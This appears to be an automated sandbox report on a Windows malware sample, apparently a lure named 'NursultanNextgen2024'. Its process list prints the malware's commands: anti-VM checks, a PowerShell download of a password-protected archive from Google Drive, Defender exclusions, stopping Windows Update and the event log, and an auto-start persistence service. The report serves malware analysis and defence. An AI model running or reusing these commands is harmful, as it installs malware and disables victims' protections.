| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "835524279" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31114606" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D3F90F1-3161-11EF-B03F-4A72145DDB9E} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31114606" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c517910592b48541be24303fa89e939b0000000002000000000010660000000100002000000079079d25de7655f64981d258529f7902f4e1cd60a1ab2a0dc0ecc0e3fbf88d44000000000e80000000020000200000000ff880dee692cd78f097bce5b483c1d32b31a32b421f03805d227f57db23584b200000007450e57fde4a12cec8a59d1ace09bc201bb7f157a075be945e93896be07753f340000000c097fd5b8a5be3af348984fb8efbbb6fac540df69d53052fb1a443de22f1b6a6d81e6c366cd7ae2213093a8289bb09e8a110d93550298f4e9b1ec9c55f9d58ca | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d074e2316ec5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636215826211716" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04de7b3f382c41f8bfa36ea205f3ae807457ff7f
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\TestEdit.xhtml
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:82945 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffc8269758,0x7fffc8269768,0x7fffc8269778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4452 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4616 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5068 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5068 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3700 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3012 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3120 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5348 --field-trial-handle=1860,i,3599615686994828832,892666266406714831,131072 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsPower"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsPower" binpath= "C:\ProgramData\windows\powershell.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsPower"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\windows\powershell.exe
C:\ProgramData\windows\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
